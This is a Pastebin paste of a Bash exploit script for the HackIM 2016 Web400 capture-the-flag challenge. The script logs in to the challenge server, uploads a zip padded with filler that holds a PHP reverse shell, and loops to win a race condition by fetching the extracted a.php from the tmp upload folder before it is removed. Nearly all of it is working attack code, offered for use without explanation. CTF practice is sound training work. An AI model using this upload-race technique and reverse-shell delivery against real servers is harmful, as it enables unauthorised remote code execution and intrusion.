API tools faq
paste
Guest User

HackIM 2016 / Web400: smashthestate

a guest
Feb 4th, 2016
291
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.98 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #
  3. # HackIM 2016 / Web400: smashthestate
  4. #
  5. # get reverse shell
  6. #
  7.  
  8. cat > result.html <<EOF
  9. <title>404 Not Found</title>
  10. EOF
  11.  
  12. # create zip + payload
  13. dd if=/dev/zero of=random.data bs=1k count=10000
  14.  
  15. # php reverse shell (e.g.: http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
  16. cp rev.php a.php
  17. zip a.zip random.data a.php
  18.  
  19. # login
  20. PHPSESSID=`curl -s -X POST "http://54.152.101.3/?page=login" -d "user=rob&pass=smashthestate" -c - | tail -1 | awk '{ print $7 }'`
  21. echo -n $PHPSESSID
  22.  
  23. # try race condition until success
  24. while cat result.html | grep "<title>404 Not Found</title>" > /dev/null; do
  25.     echo -n .
  26.     # upload zip
  27.     curl -s -X POST "http://54.152.101.3/?page=process_upload" -F "zipfile=@a.zip" -b "PHPSESSID=$PHPSESSID" > /dev/null &
  28.  
  29.     # exploit race condition by quickly opening a.php in tmp folder after unzip
  30.     sleep 1
  31.     curl -s -X GET "http://54.152.101.3/tmp/upload_${PHPSESSID}/a.php" > result.html
  32. done
  33.  
  34. cat result.html
  35. exit 0
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!